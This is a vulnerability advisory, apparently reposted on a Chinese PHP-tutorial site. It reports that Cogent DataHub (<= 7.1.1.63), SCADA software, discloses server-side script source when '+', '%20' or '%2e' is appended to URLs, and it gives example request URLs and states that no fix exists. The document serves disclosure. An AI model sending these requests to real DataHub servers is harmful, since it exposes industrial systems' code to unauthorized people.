网站地图    收藏   

主页 > 后端 > 网站安全 >

Cogent DataHub <= 7.1.1.63代码泄露缺陷及修复 - 网站

来源:自学PHP网    时间:2015-04-17 14:47 作者: 阅读:

[导读] #######################################################################1) Introduction2) Bug3) The Code4) Fix#######################################################################===========......

####################################################################### 

  

  

1) Introduction 

2) Bug 

3) The Code 

4) Fix 

  

  

####################################################################### 

  

=============== 

1)概述

=============== 

  

  

DataHub is a software for the SCADA and automation sector. 

  

  

####################################################################### 

  

====== 

2)缺陷

====== 

  

  

The server/service listens on port 80 using a custom web server. 

  

Through the appending of the following chars it's possible to view the 

content of the server-side scripts on the server: 

  

  + 

  %20 

  %2e 

  

This vulnerability is useful when the server hosts customized scripts 

which seems a feature of the software:  www.2cto.com

http://www.cogentdatahub.com/Features/DataHub_Web_ASP.html

  

  

####################################################################### 

  

=========== 

3) The Code 

=========== 

  

  

http://SERVER/index.asp

http://SERVER/index.asp%20

http://SERVER/index.asp%2e

  

  

####################################################################### 

  

====== 

4) Fix 

====== 

  

  

No fix. 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论